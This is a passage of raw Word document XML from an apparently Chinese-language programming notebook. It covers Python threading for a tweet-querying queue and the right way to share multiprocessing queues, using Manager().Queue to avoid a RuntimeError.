        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="003B1520">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>t = Thread(target=statuses_show_Thread)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102EA209" w14:textId="0563FCE5" w:rsidR="005A29C7" w:rsidRDefault="005A29C7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003B1520">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    t.start()</w:t>
      </w:r>
      <w:r w:rsidR="00DB6956" w:rsidRPr="003B1520">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DB6956" w:rsidRPr="003B1520">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidR="00DB6956" w:rsidRPr="003B1520">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>不要</w:t>
      </w:r>
      <w:r w:rsidR="00DB6956" w:rsidRPr="003B1520">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="00DB6956" w:rsidRPr="003B1520">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>.join()</w:t>
      </w:r>
      <w:r w:rsidR="00DB6956" w:rsidRPr="003B1520">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="003B1520" w:rsidRPr="003B1520">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>因为</w:t>
      </w:r>
      <w:r w:rsidR="003B1520" w:rsidRPr="003B1520">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="003B1520" w:rsidRPr="003B1520">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>.join()</w:t>
      </w:r>
      <w:r w:rsidR="003B1520" w:rsidRPr="003B1520">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的话，而线程几乎永远不死，程序不会越过这一步。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680AE279" w14:textId="77777777" w:rsidR="005A29C7" w:rsidRDefault="005A29C7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="049F266F" w14:textId="77777777" w:rsidR="005A29C7" w:rsidRDefault="005A29C7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    search_tweets()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68922812" w14:textId="77777777" w:rsidR="005A29C7" w:rsidRDefault="005A29C7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运行定时任务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1819C6" w14:textId="77777777" w:rsidR="005A29C7" w:rsidRDefault="005A29C7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    while True:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A1959A" w14:textId="77777777" w:rsidR="005A29C7" w:rsidRDefault="005A29C7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        # search_tweets()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F4F229" w14:textId="77777777" w:rsidR="005A29C7" w:rsidRDefault="005A29C7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>旧的需要单个访问的队列就不要了，清空</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DFAF818" w14:textId="77777777" w:rsidR="005A29C7" w:rsidRDefault="005A29C7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        schedule.run_pending()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1042BB" w14:textId="000C8B76" w:rsidR="005C789E" w:rsidRDefault="005A29C7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        time.sleep(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7B74A5" w14:textId="77777777" w:rsidR="005C789E" w:rsidRDefault="005C789E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="181D583A" w14:textId="2DCCC0B2" w:rsidR="005C789E" w:rsidRPr="006C0E47" w:rsidRDefault="006C0E47" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C0E47">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>多线部分如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F436B8" w14:textId="77777777" w:rsidR="006C0E47" w:rsidRDefault="006C0E47" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C1F9D68" w14:textId="77777777" w:rsidR="006C0E47" w:rsidRDefault="006C0E47" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>def statuses_show_Thread():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268F7868" w14:textId="353EE097" w:rsidR="006C0E47" w:rsidRDefault="006C0E47" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    log_debug.info("statuses_show_Thread</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开启</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690B0692" w14:textId="77777777" w:rsidR="006C0E47" w:rsidRDefault="006C0E47" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    global FIFO_queue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6707F23E" w14:textId="77777777" w:rsidR="006C0E47" w:rsidRDefault="006C0E47" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    wait = 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E5213F" w14:textId="77777777" w:rsidR="006C0E47" w:rsidRDefault="006C0E47" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0E47">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>while True:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3936DF" w14:textId="77777777" w:rsidR="006C0E47" w:rsidRDefault="006C0E47" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20FAB958" w14:textId="77777777" w:rsidR="006C0E47" w:rsidRDefault="006C0E47" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            start = time.time()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA51E83" w14:textId="77777777" w:rsidR="006C0E47" w:rsidRDefault="006C0E47" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5290749C" w14:textId="77777777" w:rsidR="006C0E47" w:rsidRPr="006C0E47" w:rsidRDefault="006C0E47" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0E47">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0E47">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>从队列中获取一个元素，如果队列为空，等待直到有元素可用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD66987" w14:textId="77777777" w:rsidR="006C0E47" w:rsidRPr="006C0E47" w:rsidRDefault="006C0E47" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C0E47">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            log_debug.debug("</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0E47">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>待单查询队列长度</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0E47">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>:"+str(FIFO_queue.qsize()))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49120F46" w14:textId="0DC3D690" w:rsidR="006C0E47" w:rsidRDefault="006C0E47" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="006C0E47">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            tweet_id = FIFO_queue.get(block=True, timeout=None)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E0DDC0" w14:textId="77777777" w:rsidR="006C0E47" w:rsidRDefault="006C0E47" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        except Exception as err:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A7E91D" w14:textId="77777777" w:rsidR="006C0E47" w:rsidRDefault="006C0E47" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            log_debug.error("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>单推特进程异常</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>: "+str(err))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A6D9A0" w14:textId="77777777" w:rsidR="006C0E47" w:rsidRDefault="006C0E47" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            if "HTTPSConnectionPool(host='api.twitter" in str(err):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F78BAA" w14:textId="77777777" w:rsidR="006C0E47" w:rsidRDefault="006C0E47" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                time.sleep(3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A2EB70" w14:textId="7BB5EFF7" w:rsidR="006C0E47" w:rsidRDefault="006C0E47" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            continue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14638BDC" w14:textId="77777777" w:rsidR="006C0E47" w:rsidRDefault="006C0E47" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78DC05B4" w14:textId="77777777" w:rsidR="006C0E47" w:rsidRDefault="006C0E47" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D0BCAC3" w14:textId="77777777" w:rsidR="005C789E" w:rsidRDefault="005C789E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B0DF8A7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="556" w:name="_Toc159779989"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>多进程的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>FIFO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>队列</w:t>
      </w:r>
      <w:bookmarkEnd w:id="556"/>
    </w:p>
    <w:p w14:paraId="3208DCEF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1910947E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>multiprocessing.Queue()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建的队列，单声明</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>global</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不传参是不对的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1D6D2F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>需要直接传参给多进程才有用（队列通常是个指针对象）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，否则会声明</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>未定义。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF25B85" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FADE70B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其实也通常使用如下代码，并不是直接使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>multiprocesssing.Queue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D854FDD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:widowControl/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi" w:hint="default"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi" w:hint="default"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>manager = multiprocessing.Manager()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5593F9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:widowControl/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi" w:hint="default"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi" w:hint="default"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>queue = manager.Queue()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541A8442" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1850B8C9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BCDC491" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FFAEECD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所以，只有声明</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>multiprocessing.Queue()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的同级模块</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>传参的子模块</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>才能访问。访问的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Queue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是同一个，非变成了形参复制了一份值的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Queue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A81FB0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14D48E63" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>from multiprocessing import Queue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39673193" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46E5A46D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Process_queue = Queue()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E1C322" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>存</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A07F1E0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>for single_path in a_list:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD70865" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    Process_queue.put(single_path)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6A0BB8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>取</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28506398" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>while not Process_queue.empty():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F097837" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    single_path = Process_queue.get()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1955A016" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04EB3820" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>注意，如果遇到问题如下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED4C5B8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>RuntimeError: Queue objects should only be shared between processes through inheritance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B1F01F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C55ABA7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>解决方法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA71011" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:widowControl/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi" w:hint="default"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi" w:hint="default"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>manager = multiprocessing.Manager()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D203350" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:widowControl/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi" w:hint="default"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
